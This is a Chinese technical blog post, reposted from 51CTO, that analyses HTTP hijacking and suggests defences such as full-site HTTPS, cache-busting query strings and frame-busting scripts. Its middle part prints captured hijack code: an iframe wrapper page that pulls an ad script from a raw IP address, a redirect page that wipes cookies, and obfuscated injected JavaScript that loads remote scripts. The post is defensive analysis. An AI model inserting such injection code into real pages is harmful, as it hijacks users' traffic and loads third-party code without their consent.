HTTP劫持分析及攻防
劫持的类型:
DNS劫持
HTTP劫持
DNS劫持:顾名思义就是直接修改网站IP,现在比较少见,易发现也容易出问题
HTTP劫持:
iframe类型
js插入
iframe劫持比较常见也不容易出现问题
上面这则广告就是劫持的效果
iframe劫持
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
<!DOCTYPE html> <html>
<head>
<meta charset="UTF-8">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta content="telephone=no" name="format-detection">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,maximum-scale=1,minimum-scale=1">
<title></title>
<script type="text/javascript" src="
<style type="text/css">
html,body{padding:0;margin:0;}
</style>
</head>
<body>
<iframe id="content" src="http://你要访问的网址" width="100%" frameborder="no">
</iframe>
</body>
<script type="text/javascript">
var _appid="900013";
</script>
<script type="text/javascript" src="http://112.74.134.239/js/ads.min.20160921.js"></script></html>
|
另外一种劫持直接就是跳转
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
C:\Users\Administrator>curl http://www.114la.com
<html> <head>
<meta http-equiv="refresh" content="0;url=http://www.xxxxx.com/?34565(要跳转的网站)
<meta name="referrer" content="never">
<script>
function clearCookie(){
var keys=document.cookie.match(/[^ =;]+(?=\=)/g);
if (keys) {
for (var i = keys.length; i--;){
document.cookie=keys[i]+'=0;domain=.114la.com;path=/;expires='+new Date( 0).toUTCString();
}
}
}
clearCookie();
</script>
</head>
<body>
</body>
</html>
|
JS劫持就是替换你的JS文件,然后重新请求一个JS文件。比如你请求的是
则会被替换为
http://www.xxxx.com/sdsd.js (插入广告代码)
http://www.xxxx.com/sdsd.js?20161121 (正常的js代码)
插入广告代码的js内容则为
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
(function() {
try {
var o = 'm-_-m',
D = document;
if (!D.getElementById(o)) {
var j = 'http://www.jxrcw.com/gposinfo/js2014/sys_frame.js',
J = j + (~j.indexOf('?') ? '&': '?') + new Date().getTime(),
M = 'http://www.170yy.com/v2/v.php?id=01',
C = D.currentScript,
H = D.getElementsByTagName('head')[0],
N = function(s, i) {
var I = D.createElement('script');
I.type = 'text/javascript';
if (i) I.id = i;
I.src = s;
H.appendChild(I);
};
if (self == top) {
N(M, o);
}
if (!C) {
C = (function() {
var S = D.scripts,
l = S.length,
i = 0;
for (; i < l; ++i) {
if (S[i].src === j) {
return S[i];
}
}
})();
}
C && ((C.defer || C.async) ? N(J) : D.write('<script src="' + J + '"><' + '/script>'));
}
} catch(e) {}
})(); |
劫持网络层分析:
从上面可以看到针对HTTP请求,出现一次重传。来看下两次传回的内容
第一次劫持返回的数据
第二次正常服务器传回的数据
两次回传的数据截然不同,正是因为劫持流量先于正常流量,因此正常流量失效,因此一个流量劫持就成功了,详细的抓包可下载本文附件
HTTP防劫持方法:
终极方法:全站HTTPS
优点:一劳永逸
缺点:成本高,对网站性能有影响,可能需要修改权限
证书费用:可以采用免费的let's encrypt,以及WoSign,StartSSL,以及腾讯云的1年免费SSL(基于亚洲诚信)
绕过劫持
优点:成本小,需改动部分代码
缺点:效果不明显,而且必须要在每个页面都加以修改
1.应对JS劫持:
根据劫持的策略,比如上面的针对http://www.xxxx.com/sdsd.js?20161121不在劫持,则在HTTP里面就自动加上?20161121这样的尾巴
2.应对iframe劫持:
在网页的头部加上
|
1
2
3
4
5
6
7
8
9
10
11
|
<script type="text/javascript">
try
{
if (self != top) {
//alert("广告跳转");
top.location=self.location;
}
}
catch (e) {
}
</script>
|
检查到网页在iframe中则自动重新加载一次
参考: 1.http://www.cnblogs.com/kenkofox/p/4924088.html
2.http://www.cnblogs.com/kenkofox/p/4919668.html
附件:http://down.51cto.com/data/2368401
本文转自 rong341233 51CTO博客,原文链接:http://blog.51cto.com/fengwan/1875011